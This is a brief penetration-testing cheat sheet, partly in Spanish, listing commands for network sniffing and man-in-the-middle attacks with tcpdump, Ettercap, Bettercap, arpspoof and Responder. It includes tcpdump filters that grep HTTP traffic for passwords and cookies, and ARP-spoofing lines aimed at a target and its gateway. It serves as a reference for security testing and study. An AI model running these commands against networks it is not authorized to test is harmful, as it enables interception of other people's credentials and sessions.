# Sniffing y MitM attack

## Tcpdump

```shell
tcpdump -i <interface>
tcpdump -i <interface> -v src <source-IP-address> and dst <destination-IP-address> and port <port>
tcpdump -i <interface> -v port 80 | egrep -i "POST /|GET /|Host:"
tcpdump -i <interface> -v port 80 | egrep -i "POST /|GET /|clave=|pwd=|passwd=|password=|Host:"
tcpdump -i <interface> -v port 80 | egrep -i "Set-Cookie:|Cookie:|Host:"
tcpdump -r <file.pcap>
```

## Ettercap

* <https://www.ettercap-project.org/>

```bash
ettercap -G
```

## Bettercap

* <https://www.bettercap.org/>

```shell
# General
bettercap
net.probe on
net.recon on
net.sniff on
net.show
events.show

# Selección de interfaz
bettercap -iface <interface>

# Sniffing host y puerto específico
set net.sniff.filter "host <IP-address> and port <port>"
net.sniff on
events.show

# Interfaz de usuario (user:pass)
bettercap -caplet http-ui
```

## ARPspoof

```shell
arpspoof -i <interface> -t <gateway-IP-address> <target-IP-address>
arpspoof -i <interface> -t <target-IP-address> <gateway-IP-address>
```

## Responder

```
responder -I <interface> -A
```